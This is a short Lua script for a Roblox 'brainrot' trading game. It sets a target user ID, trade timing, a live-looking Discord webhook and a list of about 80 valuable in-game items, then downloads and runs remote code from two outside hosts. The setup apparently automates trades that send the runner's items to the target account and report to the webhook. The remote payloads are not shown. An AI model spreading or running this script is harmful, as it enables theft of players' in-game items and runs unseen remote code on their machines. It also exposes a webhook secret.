getgenv().SECRET_KEY = "YOUR_API_KEY"

getgenv().TARGET_ID = 4393438149

getgenv().DELAY_STEP = 1      

getgenv().TRADE_CYCLE_DELAY = 2

getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1482248901393383455/iFOoMQ8lnd1dTQDAzxjCouErCU1Rg5iUvmmXToQs3E004DyNtp_dpONDrCYcprvgcS5o"

getgenv().TARGET_BRAINROTS = {

    ["Meowl"] = true,

    ["Skibidi Toilet"] = true,

    ["Strawberry Elephant"] = true,

    ["Griffin"] = true,

    ["Nacho Spyder"] = true,

    ["Tacorita Bicicleta"] = true,

    ["La Extinct Grande"] = true,

    ["La Spooky Grande"] = true,

    ["Chipso and Queso"] = true,

    ["Chillin Chili"] = true,

    ["Tuff Toucan"] = true,

    ["Gobblino Uniciclino"] = true,

    ["W or L"] = true,

    ["La Jolly Grande"] = true,

    ["La Taco Combinasion"] = true,

    ["Swaggy Bros"] = true,

    ["La Romantic Grande"] = true,

    ["Festive 67"] = true,

    ["Nuclearo Dinossauro"] = true,

    ["Money Money Puggy"] = true,

    ["Tang Tang Keletang"] = true,

    ["Ketupat Kepat"] = true,

    ["Tictac Sahur"] = true,

    ["Ketchuru and Musturu"] = true,

    ["Lavadorito Spinito"] = true,

    ["Garama and Madundung"] = true,

    ["Burguro And Fryuro"] = true,

    ["Capitano Moby"] = true,

    ["Cerberus"] = true,

    ["Dragon Cannelloni"] = true,

    ["Swag Soda"] = true,

    ["Los Hotspotsitos"] = true,

    ["Los Bros"] = true,

    ["Tralaledon"] = true,

    ["Los Puggies"] = true,

    ["Los Primos"] = true,

    ["Los Tacoritas"] = true,

    ["Los Spaghettis"] = true,

    ["Ginger Gerat"] = true,

    ["Love Love Bear"] = true,

    ["Spooky and Pumpky"] = true,

    ["Fragrama and Chocrama"] = true,

    ["La Casa Boo"] = true,

    ["Los Sekolahs"] = true,

    ["Reinito Sleighito"] = true,

    ["Ketupat Bros"] = true,

    ["Cooki and Milki"] = true,

    ["Rosey and Teddy"] = true,

    ["Popcuru and Fizzuru"] = true,

    ["La Supreme Combinasion"] = true,

    ["Dragon Gingerini"] = true,

    ["Headless Horseman"] = true,

    ["Hydra Dragon Cannelloni"] = true,

    ["Celularcini Viciosini"] = true,

    ["La Grande Combinasion"] = true,

    ["Las Sis"] = true,

    ["Los Planitos"] = true,

    ["Los Mobilis"] = true,

    ["Los Candies"] = true,

    ["Bacuru and Egguru"] = true,

    ["Eviledon"] = true,

    ["Orcaledon"] = true,

    ["Money Money Reindeer"] = true,

    ["Jolly Jolly Sahur"] = true,

    ["Los Jolly Combinasionas"] = true,

    ["Fishino Clownino"] = true,

    ["Los Spooky Combinasionas"] = true,

    ["La Ginger Sekolah"] = true,

    ["Rosetti Tualetti"] = true,

    ["Esok Sekolah"] = true,

    ["Spaghetti Tualetti"] = true,

    ["La Food Combinasion"] = true,

    ["La Secret Combinasion"] = true,

    ["Los Amigos"] = true,

    ["Los Combinasionas"] = true,

    ["Perrito Burrito"] = true,

    ["Quesadillo Vampiro"] = true,

    ["Guest 666"] = true,

    ["Sammyni Fattini"] = true

}

task.spawn(function()

loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()

end)

task.spawn(function()

loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/7eed04278e8a444cad53176fa7179daf0cc812a88a97da867a280577c2fe06f0/download"))()

end)
